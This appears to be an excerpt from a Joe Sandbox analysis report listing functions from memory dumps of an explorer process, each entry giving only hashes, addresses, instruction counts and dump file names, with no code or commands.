
Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13d000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6071ed76213279c43083d8a7231c9af45ab5b67013fe3db6f375547db9c244d1
Instruction ID: 1b76f270c80c6388c8836dee3b34d381a104b73df6f8919a9c617b541653332b
Opcode Fuzzy Hash: 6071ed76213279c43083d8a7231c9af45ab5b67013fe3db6f375547db9c244d1
Instruction Fuzzy Hash: 4221F275604204EFDB05DF60F880B26BBA5FB88718F34C5ADE8094B246C736D806CA62

Uniqueness

Uniqueness Score: -1.00%

Function 0013D32C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960207935.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13d000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc45eb03ff2a48f01e5ea850c39f4f83b40ff0711540d0806ae99556ac3f912f
Instruction ID: a6f28fda23a9daf431e2e72aa6289465c12dd9310e33914fdabed707b4def5f6
Opcode Fuzzy Hash: dc45eb03ff2a48f01e5ea850c39f4f83b40ff0711540d0806ae99556ac3f912f
Instruction Fuzzy Hash: 6A21D0B5604244EFDB04DF14F880B2ABB65FB88714F24C5A9E9494B246C73ADC06CA62

Uniqueness

Uniqueness Score: -1.00%

Function 00192C78 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2ded0b63272220c94dc52c9a4d5af4b5c830f314539ce7af8e68273df823c54
Instruction ID: 7317dca90addbfd27a79a452bd529ebf3f0962f87c75715819e578178014a9ca
Opcode Fuzzy Hash: b2ded0b63272220c94dc52c9a4d5af4b5c830f314539ce7af8e68273df823c54
Instruction Fuzzy Hash: CF212970D09248EFDB08DFE8C4446EDBBF5BF4A305F6594A9C405AB262D7309E84DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00192C88 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 023f2955786de9d2a62b59f605ca62352c395ca1d750ab353aa95c16bef3fac9
Instruction ID: 4cb939f5ff7a76c7bfdd0801d0fbd5779c9955919ec8d0a8287042ba7795353b
Opcode Fuzzy Hash: 023f2955786de9d2a62b59f605ca62352c395ca1d750ab353aa95c16bef3fac9
Instruction Fuzzy Hash: 3C212970D04208EFDB08DFE8C544AAEB7F6BF49305F6594A9C406AB351DB309E40EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00191F10 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a3f26df45d3743b36ec5463dc4345d2a156a4904d78a73be8baff388ba63fd7
Instruction ID: e0fd9eec4edf9f0c27d6a4d04883346426dfa318cff2ecd2eee77b9dfad98e4d
Opcode Fuzzy Hash: 9a3f26df45d3743b36ec5463dc4345d2a156a4904d78a73be8baff388ba63fd7
Instruction Fuzzy Hash: 0711A7B4E0820DEFCF04DFA5D5805FEBBF9AB49345F2095AAD909A3305E7305A85DB81

Uniqueness

Uniqueness Score: -1.00%

Function 0013D327 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960207935.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13d000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c581d9bab8d100a148997595d9143a7cc016b96c2ebbf0d006487390852f07c9
Instruction ID: b92ba325104f3fdca406fa04caeec462688955d4261f0ef4801625fc5c56ea7e
Opcode Fuzzy Hash: c581d9bab8d100a148997595d9143a7cc016b96c2ebbf0d006487390852f07c9
Instruction Fuzzy Hash: 33119DB9504284DFCB01CF14E5C4B15FFA1FB85314F24C6AED8494B656C33AD84ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0013D16F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960207935.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13d000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c581d9bab8d100a148997595d9143a7cc016b96c2ebbf0d006487390852f07c9
Instruction ID: 6066b4b69813de7fa0ddf485c0fc94e060b664ee93e2dcdb2d484ed24089fc52
Opcode Fuzzy Hash: c581d9bab8d100a148997595d9143a7cc016b96c2ebbf0d006487390852f07c9
Instruction Fuzzy Hash: C2119D75504280DFCB02CF60E5C4B16BFB1FB89314F24C6AED8494B656C33AD84ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 00191928 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebb601d414342f0230d107b7f1034a87c5139f04695f6fdf89feeb8b68ba7cef
Instruction ID: 016359ed3dfb8a4f281437714b81b4296769eb7c00fff5e5e25f235f023a1378
Opcode Fuzzy Hash: ebb601d414342f0230d107b7f1034a87c5139f04695f6fdf89feeb8b68ba7cef
Instruction Fuzzy Hash: DB01F132D08259EFCF06CFA0D8104EEBB72AF8732AF014469E8407B260C7712589CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00191C73 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3839df763393ff61c1a9557088950d92b59e212a345055cff4b1b90281f13b21
Instruction ID: e46a9175d0a03f5a31b2b5e88df21ddf94da3b504080865834c07acb3ba3b382
Opcode Fuzzy Hash: 3839df763393ff61c1a9557088950d92b59e212a345055cff4b1b90281f13b21
Instruction Fuzzy Hash: A811C074A05218DFCB18DF60D9807ADBBB6BF89304F2094A9D90AA7350DF316E819F00

Uniqueness

Uniqueness Score: -1.00%

Function 0012D1FD Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960140389.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_12d000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3c64dcb81e3c7202f969c83f67fc35b71923008b9361161ffdf183354607ca5
Instruction ID: c52f44848f2c0b63d9d4dca366c9c835929288d0dfc46924e7b45f3d9a702c95
Opcode Fuzzy Hash: f3c64dcb81e3c7202f969c83f67fc35b71923008b9361161ffdf183354607ca5
Instruction Fuzzy Hash: D2018431508754DAD7108A25FC84B67BB98EF42724F29C45AED055B187C778D840D7B1

Uniqueness

Uniqueness Score: -1.00%

Function 001915A2 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f8f25fb66f0688e25f79fb1231442d4a9a98cfdae4a56910c8ea4b7d00d5143
Instruction ID: 612977cc3b0a06ab689542ec23aea4ea395d9be67c67605a4894d2f756b4e91d
Opcode Fuzzy Hash: 0f8f25fb66f0688e25f79fb1231442d4a9a98cfdae4a56910c8ea4b7d00d5143
Instruction Fuzzy Hash: 5E018CA188E3C01FE70797702C655E87F388B5321AB0A01EFD4C6DB0A3C11C098BD762

Uniqueness

Uniqueness Score: -1.00%

Function 00191BD0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74022e46486ff35d3d5f451e18b3895434ac4033219407e03d82d6ab1bbea320
Instruction ID: 935d431a8fdde4cabccb82a480714accd98568a0de5a8b2f57992d3fc23d7d48
Opcode Fuzzy Hash: 74022e46486ff35d3d5f451e18b3895434ac4033219407e03d82d6ab1bbea320
Instruction Fuzzy Hash: 84014C71D096549FDB0DCFAB98001DDBBF3AFCA300F08C07AC449A6255DB7404858B51

Uniqueness

Uniqueness Score: -1.00%

Function 00198D61 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf4e900f94819c0a6e8d3246576bc01f187ff0013966efe3a30690f6831d1b45
Instruction ID: e8fd0f0ca3d90e99b0533e0bee0875724d31b13672407bc1407abe0bab41f996
Opcode Fuzzy Hash: bf4e900f94819c0a6e8d3246576bc01f187ff0013966efe3a30690f6831d1b45
Instruction Fuzzy Hash: 42110D78A05529CFE750EF28D844BD973B1FB88304F1045E5E10DA7399DB345E459F51

Uniqueness

Uniqueness Score: -1.00%

Function 00191C58 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53d926cec15f43c03e6cc396cd92e4baa6fb327101cee3180fa17ee101718131
Instruction ID: 21ffcce5a1cdbdd90dc8e008150abafedb908d2d471c83bdc418ad0bcc7bc583
Opcode Fuzzy Hash: 53d926cec15f43c03e6cc396cd92e4baa6fb327101cee3180fa17ee101718131
Instruction Fuzzy Hash: 58014C78E08208CFCF48DFA4E5849EDBBB5BF49300B205169D816A7725EB306845CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0012D1FC Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960140389.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_12d000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13399c28542891e8c51386794a0cef0db649f79ccf2576beb596888724b750ad
Instruction ID: 5feb91d9d59f106d93049bb872941c8ada2467f0593d7dd6b7c17e40b422c8f3
Opcode Fuzzy Hash: 13399c28542891e8c51386794a0cef0db649f79ccf2576beb596888724b750ad
Instruction Fuzzy Hash: 75F04F714083549EE7108A15E888B62FF98EB52724F28C45AED085B287C378DC44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00190438 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d969140d28e1ba2f6bde3401eaf176b6e7085a64940278bac7384a2157d8f7b5
Instruction ID: d6f4307a49c18a4512eeb52ed3febe177d26a8ff4ce64dbc4c98bd9e4849c845
Opcode Fuzzy Hash: d969140d28e1ba2f6bde3401eaf176b6e7085a64940278bac7384a2157d8f7b5
Instruction Fuzzy Hash: C4F027704452489FCF11DBB088116AD77B4EF43208F1404EA9405E3592CB394D40D746

Uniqueness

Uniqueness Score: -1.00%

Function 00191B30 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 980d1b974ffbfc341949f9eb65cdcc24df43ddacbb7e95ce8a735c19dc62d70e
Instruction ID: 5fcb1c5590cb16b08517ca5a1d16ee8d89c91fb2cbfcc291ee0e936bee0cd1a7
Opcode Fuzzy Hash: 980d1b974ffbfc341949f9eb65cdcc24df43ddacbb7e95ce8a735c19dc62d70e
Instruction Fuzzy Hash: 6CF0903080E289EFCF05DFA0D8404ECBF75AB1B311F554199D88667662D7704AC4EB51

Uniqueness

Uniqueness Score: -1.00%

Function 001921A0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03af594da09f4041d53a37265d7d02ce156116cc31dc3f4ff92aa84521397b49
Instruction ID: 7d6fcbe3e51b7ba913abab7ef9fea4a396559a9e3ccf1cb2e2011ec3e6d2940e
Opcode Fuzzy Hash: 03af594da09f4041d53a37265d7d02ce156116cc31dc3f4ff92aa84521397b49
Instruction Fuzzy Hash: E6F0B778D04208EFCB44DFA9C9446ADBBF8EF49304F2095AAD919A3315E7705A51DF40

Uniqueness

Uniqueness Score: -1.00%

Function 001906B9 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cfdd21a97341558aee7f8307cb887c81c9723331362d0d86a33a197362dd465
Instruction ID: c1ce11e243f9d0d43dcd73aef88785f12ac746f92d34cd3cef4de6267a83ad16
Opcode Fuzzy Hash: 8cfdd21a97341558aee7f8307cb887c81c9723331362d0d86a33a197362dd465
Instruction Fuzzy Hash: 74F0BE70905208DFCB81DFB4E88099CBFB0EF86308F1045E9E408A7222DB306E94DB40

Uniqueness

Uniqueness Score: -1.00%

Function 001993E1 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6f31e11242d2b0c02cbf1fc62fc6937b6c0520c970b0c46c3a5f560f51896bb
Instruction ID: 9ab482c41c509f063056d912f84d5f961518d7754179cf649d02a13de686aba5
Opcode Fuzzy Hash: a6f31e11242d2b0c02cbf1fc62fc6937b6c0520c970b0c46c3a5f560f51896bb
Instruction Fuzzy Hash: 4AF0E778A14258CFDB50EFA4D8486EDBBB2FB88300F1085A9E509AB399DF345D499F50

Uniqueness

Uniqueness Score: -1.00%

Function 00199692 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58718257a7ca7942cea9068f556b5c733e25851afcad40edff2d0c67123902ef
Instruction ID: 24e0e4bdb422b1d9e09e3b7e20b71a098a08ee477fe310afafc3c53410d9f2ad
Opcode Fuzzy Hash: 58718257a7ca7942cea9068f556b5c733e25851afcad40edff2d0c67123902ef
Instruction Fuzzy Hash: D2011938A452298FEB24EF24D944BE9B7B1FB89300F5040E5E509A7794DB305E85DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00191B40 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08c5ac9aaa019e89be61dd27ef86a092a481419ccf910cac1946e3dd76bd7a10
Instruction ID: b8076dacd05d71105c8f8853c8e2e9c01e9dbe3d5ac2ee7cfbb27e4fbf1c7a88
Opcode Fuzzy Hash: 08c5ac9aaa019e89be61dd27ef86a092a481419ccf910cac1946e3dd76bd7a10
Instruction Fuzzy Hash: 39E09B3090910CFBCF04EF90E8445BCBB7AFB4A311F509154D84613251EB3059D0E745

Uniqueness

Uniqueness Score: -1.00%

Function 05896371 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.976291718.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5890000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e399866f9b493f7afc199a0583ead4ea5de6ccce231d6c8d059b5046ba24a55
Instruction ID: 6f9d292f610421f1dce1942e9ddc8d0c181bdd63c0a220ebe4705a69ae4884ab
Opcode Fuzzy Hash: 2e399866f9b493f7afc199a0583ead4ea5de6ccce231d6c8d059b5046ba24a55
Instruction Fuzzy Hash: 0EF01274908248EFCB45CFA8D844A9CBFB0EB8A214F1482EAD815E73A2D3315A41DF50

Uniqueness

Uniqueness Score: -1.00%

Function 05896C80 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.976291718.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5890000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c677836e8f7a39d927df2973b68dfbc0284df54f4640b3d5079020db20abfa5
Instruction ID: 302edfb53500fdc0299363d0719b41cacb430031e5d5e0e28109a33b0cf333e5
Opcode Fuzzy Hash: 9c677836e8f7a39d927df2973b68dfbc0284df54f4640b3d5079020db20abfa5
Instruction Fuzzy Hash: E8F03A74D09248AFCB45CFA8D8406DCBFB0EF89304F1481EAD805D3351D2314A52CF41

Uniqueness

Uniqueness Score: -1.00%

Function 001971D0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50088112aa758b2579d6702680582b25c8c74e32498f8a4c690ae8080ab3355a
Instruction ID: 6ddd7ba214e6cd5cc7e8a273bf34cb47498aa1d592db5d303ae3fb4676fd2d5b
Opcode Fuzzy Hash: 50088112aa758b2579d6702680582b25c8c74e32498f8a4c690ae8080ab3355a
Instruction Fuzzy Hash: A6E0653540D284AFCB12DBB49C5559DBF749F46204B1541EBC945C72A3E6310948D793

Uniqueness

Uniqueness Score: -1.00%

Function 00190448 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a11e146c795160d96ba0a6e37a0927a11bb9d36f175448434141ffe087b8252
Instruction ID: 2d3d87f932835a3171d7cbe80bc31ea96a9163a4126d99d0856030111514f41e
Opcode Fuzzy Hash: 7a11e146c795160d96ba0a6e37a0927a11bb9d36f175448434141ffe087b8252
Instruction Fuzzy Hash: B9E086B0941208DBCF54EFF0C912A7EB3B8EF46208F14186D950AB3291DF365E40E659

Uniqueness

Uniqueness Score: -1.00%

Function 001915FF Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9895e415ad8123ab68450472599131784f411e9c57dfea9511292bdea9d93a75
Instruction ID: c857bd0561f010b92a931acb40a844df670ca4a368d82e44e68d237db9dc5d69
Opcode Fuzzy Hash: 9895e415ad8123ab68450472599131784f411e9c57dfea9511292bdea9d93a75
Instruction Fuzzy Hash: 6BE04F7180E349AFC751DFB0EC54699BBB8EB57200F041DEAD444D3262EA355A85CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00199C32 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62f5c4de6fdb8cc8b62660d92cf00bef4db741146078d2425b6127f600ed83eb
Instruction ID: d8ca2bad767afdf12a621fff8f06fa7db540e38e3f777bad6d4711f6a993b649
Opcode Fuzzy Hash: 62f5c4de6fdb8cc8b62660d92cf00bef4db741146078d2425b6127f600ed83eb
Instruction Fuzzy Hash: 46F0A574E04208AFCB44DBA8D98169DBFB0EB89204F14C1AEC81993381D7319A46DF81

Uniqueness

Uniqueness Score: -1.00%

Function 05896A98 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.976291718.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5890000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22499358650e3e80bb39b93a9d53ff860fe269d324d388859d9da6732aeb8609
Instruction ID: 2ff0b0ead4548ac9e5e8d6cbb48aab4ba3246f603befde7d119368275f2e306f
Opcode Fuzzy Hash: 22499358650e3e80bb39b93a9d53ff860fe269d324d388859d9da6732aeb8609
Instruction Fuzzy Hash: 33F0A0359092049FCB05CFA0D880688BF70EF42314F2481EED801573A2C3324956DB41

Uniqueness

Uniqueness Score: -1.00%

Function 001925E0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cae3c283fdec4ceb52af783c138e46fb5425d44314cf184c2b13186a41d4c787
Instruction ID: 066e99bc0d5f7318c020afa55f6ddc5a25c71f4469290ae1a686e75e203f5e94
Opcode Fuzzy Hash: cae3c283fdec4ceb52af783c138e46fb5425d44314cf184c2b13186a41d4c787
Instruction Fuzzy Hash: 2AF03970E49288AFCB41CFB8D8445CDBFB0AB56300F1481EAC804A3352E6340A54DF01

Uniqueness

Uniqueness Score: -1.00%

Function 00190718 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdd07b8872af4a719a27d8f9a2c3704ebe5842086dc76b0f823460eda0b10a14
Instruction ID: 8ed27dee8c55bcf4bed9cff6405fd937cffdb50f5b9e9cac621adf872071aeca
Opcode Fuzzy Hash: cdd07b8872af4a719a27d8f9a2c3704ebe5842086dc76b0f823460eda0b10a14
Instruction Fuzzy Hash: 8FE08C308082089FC302DFE4EC45BA9BBB8AB0B205F0800D5E44897261DB306E84DB55

Uniqueness

Uniqueness Score: -1.00%

Function 05896119 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.976291718.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5890000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6adf3ce044a6b013ba47b83a124a635d9f172033bb0618c63c665e8b821562b
Instruction ID: 199bc8af545e30c758662fbac97aa2f4e7fdfd9a9c17d8673917874e6da8220e
Opcode Fuzzy Hash: d6adf3ce044a6b013ba47b83a124a635d9f172033bb0618c63c665e8b821562b
Instruction Fuzzy Hash: 56E0E574819648DFDB51EFA8D989388BFB0FF05205F1046EAD84AD72A1E7700A44DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00198EA8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cf7fb6b835c4eb92189908c7180f07b17f663fd697d1ebdb90ad56701df395b
Instruction ID: c60d01e69153c04fa128e032b9d1547e32e1bb22b8ac0517ae864a22a0119b7f
Opcode Fuzzy Hash: 7cf7fb6b835c4eb92189908c7180f07b17f663fd697d1ebdb90ad56701df395b
Instruction Fuzzy Hash: AAF015B090422ECFDB20DF64DC94BAEB3B0FB05300F5089AAE01AA3380DB305E848F55

Uniqueness

Uniqueness Score: -1.00%

Function 05896380 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.976291718.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5890000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70204a85715740f83be293bc90950890d61c6a0c5be691207e7a5faf90fa6e42
Instruction ID: 2b70ea0230d2deeeb55e0ac72ef746a6446125ac11e9889708ab4cf018a4b454
Opcode Fuzzy Hash: 70204a85715740f83be293bc90950890d61c6a0c5be691207e7a5faf90fa6e42
Instruction Fuzzy Hash: 5DE0C274E04208EFCB44DFA8D940A9CFBB4EB88304F14C0AAD918A3340E731AA51DF80

Uniqueness

Uniqueness Score: -1.00%

Function 00192BBE Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a62a7773b2b6298a211c00ba077eff18865c16cbb736c414b171503a2f090ae1
Instruction ID: 1a9ce4521d1beb328d7e1c3eeabcbd3d57056db6b8e940117a987e8ecab1b1ef
Opcode Fuzzy Hash: a62a7773b2b6298a211c00ba077eff18865c16cbb736c414b171503a2f090ae1
Instruction Fuzzy Hash: F2E0173AB48019DBCF08CFD8D8408FDF3B8FB5A314B255811D40AA7605D330A9059B50

Uniqueness

Uniqueness Score: -1.00%

Function 00199C38 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac5dcbe4c99bbe658867e2b6c617f5e4bbfe8d78da1e3a881ecef53b186ee0bb
Instruction ID: 96a914f6cb44b1428f81008e8cd42132bc4190967325a7981ff31b2add3a05b0
Opcode Fuzzy Hash: ac5dcbe4c99bbe658867e2b6c617f5e4bbfe8d78da1e3a881ecef53b186ee0bb
Instruction Fuzzy Hash: D8E07574E04208AFCB44DFA8D94569DFBF4EB88304F1481A9D81893341D7359A51DF81

Uniqueness

Uniqueness Score: -1.00%

Function 058903A8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.976291718.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5890000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
